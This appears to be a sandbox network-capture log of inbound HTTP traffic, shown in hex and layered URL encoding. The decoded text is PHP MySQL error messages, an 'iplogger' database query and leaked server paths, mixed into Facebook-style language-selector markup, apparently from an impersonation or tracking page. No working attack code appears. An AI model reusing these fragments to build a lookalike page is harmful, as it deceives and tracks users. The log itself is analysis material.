2022-10-07 13:58:40 UTC	72	IN	Data Raw: 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 32 30 6f 6e 5c 75 30 30 32 35 32 30 6c 69 6e 65 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 34 37 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 32 30 5c 2f 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 32 30 5c 2f 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 57 61 72 6e 69 6e 67 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 3a 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 32 30 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 5c 75 30 30 32 35 32 30 41 63 63 65 73 73 5c 75 30 Data Ascii: 3C\/b\u00253E\u002520on\u002520line\u002520\u00253Cb\u00253E47\u00253C\/b\u00253E\u00250A\u00253Cbr\u002520\/\u00253E\u00250A\u00253Cbr\u002520\/\u00253E\u00250A\u00253Cb\u00253EWarning\u00253C\/b\u00253E:\u002520\u002520mysql_pconnect():\u002520Access\u0
2022-10-07 13:58:40 UTC	73	IN	Data Raw: 32 30 6c 69 6d 69 74 5c 75 30 30 32 35 32 30 30 2c 31 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 73 6d 61 6c 6c 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 66 6f 6e 74 5c 75 30 30 32 35 32 30 63 6f 6c 6f 72 3d 5c 75 30 30 32 35 32 32 5c 75 30 30 32 35 32 33 66 66 30 30 30 30 5c 75 30 30 32 35 32 32 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 35 42 54 45 50 5c 75 30 30 32 35 32 30 53 54 4f 50 5c 75 30 30 32 35 35 44 5c 75 30 30 32 35 33 43 5c 2f 66 6f 6e 74 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 5c 2f 73 6d 61 6c 6c 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 Data Ascii: 20limit\u0025200,1\u00253Cbr\u00253E\u00250A\u00253Cbr\u00253E\u00250A\u00253Csmall\u00253E\u00250A\u00253Cfont\u002520color=\u002522\u002523ff0000\u002522\u00253E\u00255BTEP\u002520STOP\u00255D\u00253C\/font\u00253E\u00250A\u00253C\/small\u00253E\u00250A
2022-10-07 13:58:40 UTC	75	IN	Data Raw: 75 73 65 72 25 32 30 26 23 30 33 39 3b 64 62 6e 65 77 30 31 26 23 30 33 39 3b 26 23 30 36 34 3b 26 23 30 33 39 3b 6c 6f 63 61 6c 68 6f 73 74 26 23 30 33 39 3b 25 32 30 28 75 73 69 6e 67 25 32 30 70 61 73 73 77 6f 72 64 3a 25 32 30 59 45 53 29 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 73 65 6c 65 63 74 25 32 30 69 70 6c 6f 67 67 65 72 25 32 30 66 72 6f 6d 25 32 30 74 5f 63 68 61 6e 6e 65 6c 73 25 32 30 77 68 65 72 65 25 32 30 6e 61 6d 65 3d 26 23 30 33 39 3b 33 38 62 32 63 37 61 31 61 66 34 35 34 64 33 38 32 39 32 37 66 38 31 35 34 33 64 38 36 30 35 35 38 38 36 62 63 30 32 38 36 33 34 35 37 26 23 30 33 39 3b 25 32 30 6c 69 6d 69 74 25 32 30 30 2c 31 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 73 6d 61 6c 6c 25 Data Ascii: user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%3Cbr%3E%0A%3Cbr%3Eselect%20iplogger%20from%20t_channels%20where%20name='38b2c7a1af454d382927f81543d86055886bc02863457'%20limit%200,1%3Cbr%3E%0A%3Cbr%3E%0A%3Csmall%
2022-10-07 13:58:40 UTC	76	IN	Data Raw: 30 32 35 33 45 34 37 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 32 30 5c 2f 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 32 30 5c 2f 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 57 61 72 6e 69 6e 67 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 3a 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 32 30 6d 79 73 71 6c 5f 71 75 65 72 79 28 29 5c 75 30 30 32 35 32 30 65 78 70 65 63 74 73 5c 75 30 30 32 35 32 30 70 61 72 61 6d 65 74 65 72 5c 75 30 30 32 35 32 30 32 5c 75 30 30 32 35 32 30 74 6f 5c 75 30 30 32 35 32 30 62 65 5c 75 30 30 32 35 32 30 72 65 73 6f 75 72 63 Data Ascii: 0253E47\u00253C\/b\u00253E\u00250A\u00253Cbr\u002520\/\u00253E\u00250A\u00253Cbr\u002520\/\u00253E\u00250A\u00253Cb\u00253EWarning\u00253C\/b\u00253E:\u002520\u002520mysql_query()\u002520expects\u002520parameter\u0025202\u002520to\u002520be\u002520resourc
2022-10-07 13:58:40 UTC	78	IN	Data Raw: 3a 25 32 30 25 32 30 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 25 32 30 54 68 65 25 32 30 6d 79 73 71 6c 25 32 30 65 78 74 65 6e 73 69 6f 6e 25 32 30 69 73 25 32 30 64 65 70 72 65 63 61 74 65 64 25 32 30 61 6e 64 25 32 30 77 69 6c 6c 25 32 30 62 65 25 32 30 72 65 6d 6f 76 65 64 25 32 30 69 6e 25 32 30 74 68 65 25 32 30 66 75 74 75 72 65 3a 25 32 30 75 73 65 25 32 30 6d 79 73 71 6c 69 25 32 30 6f 72 25 32 30 50 44 4f 25 32 30 69 6e 73 74 65 61 64 25 32 30 69 6e 25 32 30 25 33 43 62 25 33 45 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 2f 73 65 65 6d 6f 72 65 62 74 79 2f 69 6e 63 6c 75 64 65 73 2f 64 61 74 61 62 61 73 65 2e 70 68 70 25 33 43 2f 62 25 33 45 25 32 30 6f 6e 25 32 30 6c 69 6e 65 25 32 30 25 33 43 62 Data Ascii: :%20%20mysql_pconnect():%20The%20mysql%20extension%20is%20deprecated%20and%20will%20be%20removed%20in%20the%20future:%20use%20mysqli%20or%20PDO%20instead%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb
2022-10-07 13:58:40 UTC	79	IN	Data Raw: 64 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 3a 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 32 30 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 5c 75 30 30 32 35 32 30 54 68 65 5c 75 30 30 32 35 32 30 6d 79 73 71 6c 5c 75 30 30 32 35 32 30 65 78 74 65 6e 73 69 6f 6e 5c 75 30 30 32 35 32 30 69 73 5c 75 30 30 32 35 32 30 64 65 70 72 65 63 61 74 65 64 5c 75 30 30 32 35 32 30 61 6e 64 5c 75 30 30 32 35 32 30 77 69 6c 6c 5c 75 30 30 32 35 32 30 62 65 5c 75 30 30 32 35 32 30 72 65 6d 6f 76 65 64 5c 75 30 30 32 35 32 30 69 6e 5c 75 30 30 32 35 32 30 74 68 65 5c 75 30 30 32 35 32 30 66 75 74 75 72 65 3a 5c 75 30 30 32 35 32 30 75 73 65 5c 75 30 30 32 35 32 30 6d 79 73 71 6c 69 5c 75 30 30 32 35 32 30 6f 72 5c 75 30 30 32 35 32 30 50 44 4f 5c 75 Data Ascii: d\u00253C\/b\u00253E:\u002520\u002520mysql_pconnect():\u002520The\u002520mysql\u002520extension\u002520is\u002520deprecated\u002520and\u002520will\u002520be\u002520removed\u002520in\u002520the\u002520future:\u002520use\u002520mysqli\u002520or\u002520PDO\u
2022-10-07 13:58:40 UTC	81	IN	Data Raw: 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 31 30 34 35 5c 75 30 30 32 35 32 30 2d 5c 75 30 30 32 35 32 30 41 63 63 65 73 73 5c 75 30 30 32 35 32 30 64 65 6e 69 65 64 5c 75 30 30 32 35 32 30 66 6f 72 5c 75 30 30 32 35 32 30 75 73 65 72 5c 75 30 30 32 35 32 30 26 23 30 33 39 3b 64 62 6e 65 77 30 31 26 23 30 33 39 3b 5c 75 30 30 34 30 26 23 30 33 39 3b 6c 6f 63 61 6c 68 6f 73 74 26 23 30 33 39 3b 5c 75 30 30 32 35 32 30 28 75 73 69 6e 67 5c 75 30 30 32 35 32 30 70 61 73 73 77 6f 72 64 3a 5c 75 30 30 32 35 32 30 59 45 53 29 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 73 65 6c 65 63 74 5c 75 30 30 32 35 32 30 69 70 6c 6f 67 67 65 Data Ascii: 253E\u00250A\u00253Cb\u00253E1045\u002520-\u002520Access\u002520denied\u002520for\u002520user\u002520'dbnew01'\u0040'localhost'\u002520(using\u002520password:\u002520YES)\u00253Cbr\u00253E\u00250A\u00253Cbr\u00253Eselect\u002520iplogge
2022-10-07 13:58:40 UTC	82	IN	Data Raw: 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 62 25 33 45 57 61 72 6e 69 6e 67 25 33 43 2f 62 25 33 45 3a 25 32 30 25 32 30 6d 79 73 71 6c 5f 71 75 65 72 79 28 29 25 32 30 65 78 70 65 63 74 73 25 32 30 70 61 72 61 6d 65 74 65 72 25 32 30 32 25 32 30 74 6f 25 32 30 62 65 25 32 30 72 65 73 6f 75 72 63 65 2c 25 32 30 62 6f 6f 6c 65 61 6e 25 32 30 67 69 76 65 6e 25 32 30 69 6e 25 32 30 25 33 43 62 25 33 45 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 2f 73 65 65 6d 6f 72 65 62 74 79 2f 69 6e 63 6c 75 64 65 73 2f 64 61 74 61 62 61 73 65 2e 70 68 70 25 33 43 2f 62 25 33 45 25 32 30 6f 6e 25 32 30 6c 69 6e 65 25 32 30 25 33 43 62 25 33 45 37 33 25 33 43 2f 62 25 33 45 25 30 41 25 Data Ascii: Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_query()%20expects%20parameter%202%20to%20be%20resource,%20boolean%20given%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E73%3C/b%3E%0A%
2022-10-07 13:58:40 UTC	84	IN	Data Raw: 32 35 33 45 3a 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 32 30 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 5c 75 30 30 32 35 32 30 41 63 63 65 73 73 5c 75 30 30 32 35 32 30 64 65 6e 69 65 64 5c 75 30 30 32 35 32 30 66 6f 72 5c 75 30 30 32 35 32 30 75 73 65 72 5c 75 30 30 32 35 32 30 26 23 30 33 39 3b 64 62 6e 65 77 30 31 26 23 30 33 39 3b 5c 75 30 30 34 30 26 23 30 33 39 3b 6c 6f 63 61 6c 68 6f 73 74 26 23 30 33 39 3b 5c 75 30 30 32 35 32 30 28 75 73 69 6e 67 5c 75 30 30 32 35 32 30 70 61 73 73 77 6f 72 64 3a 5c 75 30 30 32 35 32 30 59 45 53 29 5c 75 30 30 32 35 32 30 69 6e 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 5c 2f 77 77 77 5c 2f 77 77 77 72 6f 6f 74 5c 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 5c 2f 73 65 Data Ascii: 253E:\u002520\u002520mysql_pconnect():\u002520Access\u002520denied\u002520for\u002520user\u002520'dbnew01'\u0040'localhost'\u002520(using\u002520password:\u002520YES)\u002520in\u002520\u00253Cb\u00253E\/www\/wwwroot\/103.136.42.153\/se
2022-10-07 13:58:40 UTC	85	IN	Data Raw: 33 43 5c 2f 66 6f 6e 74 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 5c 2f 73 6d 61 6c 6c 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 5c 2f 66 6f 6e 74 5c 75 30 30 32 35 33 45 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 77 77 77 5f 6c 69 73 74 5f 73 65 6c 65 63 74 6f 72 26 71 75 6f 74 3b 2c 20 36 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 20 74 69 74 6c 65 3d 22 54 75 72 6b 69 73 68 22 3e 54 c3 bc 72 6b c3 a7 65 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 63 Data Ascii: 3C\/font\u00253E\u00250A\u00253C\/small\u00253E\u00250A\u00253Cbr\u00253E\u00250A\u00253Cbr\u00253E\u00250A\u00253C\/b\u00253E\u00250A\u00253C\/font\u00253E", "www_list_selector", 6); return false;" title="Turkish">Trke</a></li><li><a c
2022-10-07 13:58:40 UTC	87	IN	Data Raw: 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 73 6d 61 6c 6c 25 33 45 25 30 41 25 33 43 66 6f 6e 74 25 32 30 63 6f 6c 6f 72 3d 25 32 32 25 32 33 66 66 30 30 30 30 25 32 32 25 33 45 25 35 42 54 45 50 25 32 30 53 54 4f 50 25 35 44 25 33 43 2f 66 6f 6e 74 25 33 45 25 30 41 25 33 43 2f 73 6d 61 6c 6c 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 2f 62 25 33 45 25 30 41 25 33 43 2f 66 6f 6e 74 25 33 45 22 20 6f 6e 63 6c 69 63 6b 3d 22 72 65 71 75 69 72 65 28 26 71 75 6f 74 3b 49 6e 74 6c 55 74 69 6c 73 26 71 75 6f 74 3b 29 2e 73 65 74 43 6f 6f 6b 69 65 4c 6f 63 61 6c 65 28 26 71 75 6f 74 3b 61 72 5f 41 52 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 65 6e 5f 55 53 26 71 75 6f 74 3b 2c 20 26 71 75 Data Ascii: br%3E%0A%3Cbr%3E%0A%3Csmall%3E%0A%3Cfont%20color=%22%23ff0000%22%3E%5BTEP%20STOP%5D%3C/font%3E%0A%3C/small%3E%0A%3Cbr%3E%0A%3Cbr%3E%0A%3C/b%3E%0A%3C/font%3E" onclick="require("IntlUtils").setCookieLocale("ar_AR", "en_US", &qu
2022-10-07 13:58:40 UTC	88	IN	Data Raw: 30 74 6f 5c 75 30 30 32 35 32 30 62 65 5c 75 30 30 32 35 32 30 72 65 73 6f 75 72 63 65 2c 5c 75 30 30 32 35 32 30 62 6f 6f 6c 65 61 6e 5c 75 30 30 32 35 32 30 67 69 76 65 6e 5c 75 30 30 32 35 32 30 69 6e 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 5c 2f 77 77 77 5c 2f 77 77 77 72 6f 6f 74 5c 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 5c 2f 73 65 65 6d 6f 72 65 62 74 79 5c 2f 69 6e 63 6c 75 64 65 73 5c 2f 64 61 74 61 62 61 73 65 2e 70 68 70 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 32 30 6f 6e 5c 75 30 30 32 35 32 30 6c 69 6e 65 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 37 33 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c Data Ascii: 0to\u002520be\u002520resource,\u002520boolean\u002520given\u002520in\u002520\u00253Cb\u00253E\/www\/wwwroot\/103.136.42.153\/seemorebty\/includes\/database.php\u00253C\/b\u00253E\u002520on\u002520line\u002520\u00253Cb\u00253E73\u00253C\/b\u00253E\u00250A\
2022-10-07 13:58:40 UTC	90	IN	Data Raw: 62 61 73 65 2e 70 68 70 25 33 43 2f 62 25 33 45 25 32 30 6f 6e 25 32 30 6c 69 6e 65 25 32 30 25 33 43 62 25 33 45 34 37 25 33 43 2f 62 25 33 45 25 30 41 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 62 25 33 45 57 61 72 6e 69 6e 67 25 33 43 2f 62 25 33 45 3a 25 32 30 25 32 30 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 25 32 30 41 63 63 65 73 73 25 32 30 64 65 6e 69 65 64 25 32 30 66 6f 72 25 32 30 75 73 65 72 25 32 30 26 23 30 33 39 3b 64 62 6e 65 77 30 31 26 23 30 33 39 3b 26 23 30 36 34 3b 26 23 30 33 39 3b 6c 6f 63 61 6c 68 6f 73 74 26 23 30 33 39 3b 25 32 30 28 75 73 69 6e 67 25 32 30 70 61 73 73 77 6f 72 64 3a 25 32 30 59 45 53 29 25 32 30 69 6e 25 32 30 25 33 43 62 25 33 45 2f 77 77 77 2f Data Ascii: base.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_pconnect():%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%20in%20%3Cb%3E/www/
2022-10-07 13:58:40 UTC	91	IN	Data Raw: 30 30 32 35 32 30 6d 79 73 71 6c 69 5c 75 30 30 32 35 32 30 6f 72 5c 75 30 30 32 35 32 30 50 44 4f 5c 75 30 30 32 35 32 30 69 6e 73 74 65 61 64 5c 75 30 30 32 35 32 30 69 6e 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 5c 2f 77 77 77 5c 2f 77 77 77 72 6f 6f 74 5c 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 5c 2f 73 65 65 6d 6f 72 65 62 74 79 5c 2f 69 6e 63 6c 75 64 65 73 5c 2f 64 61 74 61 62 61 73 65 2e 70 68 70 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 32 30 6f 6e 5c 75 30 30 32 35 32 30 6c 69 6e 65 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 34 37 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c Data Ascii: 002520mysqli\u002520or\u002520PDO\u002520instead\u002520in\u002520\u00253Cb\u00253E\/www\/wwwroot\/103.136.42.153\/seemorebty\/includes\/database.php\u00253C\/b\u00253E\u002520on\u002520line\u002520\u00253Cb\u00253E47\u00253C\/b\u00253E\u00250A\u00253Cbr\
2022-10-07 13:58:40 UTC	92	IN	Data Raw: 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 73 65 6c 65 63 74 5c 75 30 30 32 35 32 30 69 70 6c 6f 67 67 65 72 5c 75 30 30 32 35 32 30 66 72 6f 6d 5c 75 30 30 32 35 32 30 74 5f 63 68 61 6e 6e 65 6c 73 5c 75 30 30 32 35 32 30 77 68 65 72 65 5c 75 30 30 32 35 32 30 6e 61 6d 65 3d 26 23 30 33 39 3b 33 38 62 32 63 37 61 31 61 66 34 35 34 64 33 38 32 39 32 37 66 38 31 35 34 33 64 38 36 30 35 35 38 38 36 62 63 30 32 38 36 33 34 35 37 26 23 30 33 39 3b 5c 75 30 30 32 35 32 30 6c 69 6d 69 74 5c 75 30 30 32 35 32 30 30 2c 31 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 73 6d 61 6c 6c 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c Data Ascii: 253Cbr\u00253Eselect\u002520iplogger\u002520from\u002520t_channels\u002520where\u002520name='38b2c7a1af454d382927f81543d86055886bc02863457'\u002520limit\u0025200,1\u00253Cbr\u00253E\u00250A\u00253Cbr\u00253E\u00250A\u00253Csmall\u00253E\u00250A\
2022-10-07 13:58:40 UTC	94	IN	Data Raw: 33 43 2f 62 25 33 45 25 32 30 6f 6e 25 32 30 6c 69 6e 65 25 32 30 25 33 43 62 25 33 45 37 33 25 33 43 2f 62 25 33 45 25 30 41 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 66 6f 6e 74 25 32 30 63 6f 6c 6f 72 3d 25 32 32 25 32 33 30 30 30 30 30 30 25 32 32 25 33 45 25 30 41 25 33 43 62 25 33 45 31 30 34 35 25 32 30 2d 25 32 30 41 63 63 65 73 73 25 32 30 64 65 6e 69 65 64 25 32 30 66 6f 72 25 32 30 75 73 65 72 25 32 30 26 23 30 33 39 3b 64 62 6e 65 77 30 31 26 23 30 33 39 3b 26 23 30 36 34 3b 26 23 30 33 39 3b 6c 6f 63 61 6c 68 6f 73 74 26 23 30 33 39 3b 25 32 30 28 75 73 69 6e 67 25 32 30 70 61 73 73 77 6f 72 64 3a 25 32 30 59 45 53 29 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 73 65 6c 65 63 74 25 32 30 69 70 6c 6f 67 67 65 72 25 32 Data Ascii: 3C/b%3E%20on%20line%20%3Cb%3E73%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cfont%20color=%22%23000000%22%3E%0A%3Cb%3E1045%20-%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%3Cbr%3E%0A%3Cbr%3Eselect%20iplogger%2
2022-10-07 13:58:40 UTC	94	IN	Data Raw: 30 25 32 32 25 33 45 25 35 42 54 45 50 25 32 30 53 54 4f 50 25 35 44 25 33 43 2f 66 6f 6e 74 25 33 45 25 30 41 25 33 43 2f 73 6d 61 6c 6c 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 2f 62 25 33 45 25 30 41 25 33 43 2f 66 6f 6e 74 25 33 45 22 20 6f 6e 63 6c 69 63 6b 3d 22 72 65 71 75 69 72 65 28 26 71 75 6f 74 3b 49 6e 74 6c 55 74 69 6c 73 26 71 75 6f 74 3b 29 2e 73 65 74 43 6f 6f 6b 69 65 4c 6f 63 61 6c 65 28 26 71 75 6f 74 3b 7a 68 5f 43 4e 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 65 6e 5f 55 53 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 7a 68 2d 63 6e 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 32 30 5c 2f 5c 75 30 30 32 35 33 Data Ascii: 0%22%3E%5BTEP%20STOP%5D%3C/font%3E%0A%3C/small%3E%0A%3Cbr%3E%0A%3Cbr%3E%0A%3C/b%3E%0A%3C/font%3E" onclick="require("IntlUtils").setCookieLocale("zh_CN", "en_US", "https:\/\/zh-cn.facebook.com\/\u00253Cbr\u002520\/\u00253
2022-10-07 13:58:40 UTC	96	IN	Data Raw: 30 30 32 35 32 30 69 6e 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 5c 2f 77 77 77 5c 2f 77 77 77 72 6f 6f 74 5c 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 5c 2f 73 65 65 6d 6f 72 65 62 74 79 5c 2f 69 6e 63 6c 75 64 65 73 5c 2f 64 61 74 61 62 61 73 65 2e 70 68 70 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 32 30 6f 6e 5c 75 30 30 32 35 32 30 6c 69 6e 65 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 37 33 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 32 30 5c 2f 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 66 6f 6e 74 5c 75 30 30 32 35 32 30 63 6f 6c 6f 72 Data Ascii: 002520in\u002520\u00253Cb\u00253E\/www\/wwwroot\/103.136.42.153\/seemorebty\/includes\/database.php\u00253C\/b\u00253E\u002520on\u002520line\u002520\u00253Cb\u00253E73\u00253C\/b\u00253E\u00250A\u00253Cbr\u002520\/\u00253E\u00250A\u00253Cfont\u002520color
2022-10-07 13:58:40 UTC	97	IN	Data Raw: 41 25 32 35 32 30 75 73 65 25 32 35 32 30 6d 79 73 71 6c 69 25 32 35 32 30 6f 72 25 32 35 32 30 50 44 4f 25 32 35 32 30 69 6e 73 74 65 61 64 25 32 35 32 30 69 6e 25 32 35 32 30 25 32 35 33 43 62 25 32 35 33 45 25 32 46 77 77 77 25 32 46 77 77 77 72 6f 6f 74 25 32 46 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 25 32 46 73 65 65 6d 6f 72 65 62 74 79 25 32 46 69 6e 63 6c 75 64 65 73 25 32 46 64 61 74 61 62 61 73 65 2e 70 68 70 25 32 35 33 43 25 32 46 62 25 32 35 33 45 25 32 35 32 30 6f 6e 25 32 35 32 30 6c 69 6e 65 25 32 35 32 30 25 32 35 33 43 62 25 32 35 33 45 34 37 25 32 35 33 43 25 32 46 62 25 32 35 33 45 25 32 35 30 41 25 32 35 33 43 62 72 25 32 35 32 30 25 32 46 25 32 35 33 45 25 32 35 30 41 25 32 35 33 43 62 72 25 32 35 32 30 25 32 46 25 32 35 33 45 25 Data Ascii: A%2520use%2520mysqli%2520or%2520PDO%2520instead%2520in%2520%253Cb%253E%2Fwww%2Fwwwroot%2F103.136.42.153%2Fseemorebty%2Fincludes%2Fdatabase.php%253C%2Fb%253E%2520on%2520line%2520%253Cb%253E47%253C%2Fb%253E%250A%253Cbr%2520%2F%253E%250A%253Cbr%2520%2F%253E%
2022-10-07 13:58:40 UTC	99	IN	Data Raw: 25 32 35 33 45 25 32 35 30 41 25 32 35 33 43 62 72 25 32 35 33 45 25 32 35 30 41 25 32 35 33 43 62 72 25 32 35 33 45 25 32 35 30 41 25 32 35 33 43 25 32 46 62 25 32 35 33 45 25 32 35 30 41 25 32 35 33 43 25 32 46 66 6f 6e 74 25 32 35 33 45 26 61 6d 70 3b 73 6f 75 72 63 65 3d 77 77 77 5f 6c 69 73 74 5f 73 65 6c 65 63 74 6f 72 5f 6d 6f 72 65 22 20 68 72 65 66 3d 22 23 22 20 74 69 74 6c 65 3d 22 53 68 6f 77 20 6d 6f 72 65 20 6c 61 6e 67 75 61 67 65 73 22 3e 3c 69 20 63 6c 61 73 73 3d 22 69 6d 67 20 73 70 5f 6f 74 31 74 35 59 6a 59 4c 33 73 20 73 78 5f 32 63 66 61 37 64 22 3e 3c 2f 69 3e 3c 2f 61 3e 3c 2f 6c 69 3e 3c 2f 75 6c 3e 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 43 75 72 76 65 22 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 69 64 3d 22 70 61 67 65 46 6f Data Ascii: %253E%250A%253Cbr%253E%250A%253Cbr%253E%250A%253C%2Fb%253E%250A%253C%2Ffont%253E&source=www_list_selector_more" href="#" title="Show more languages"><i class="img sp_ot1t5YjYL3s sx_2cfa7d"></i></a></li></ul><div id="contentCurve"></div><div id="pageFo
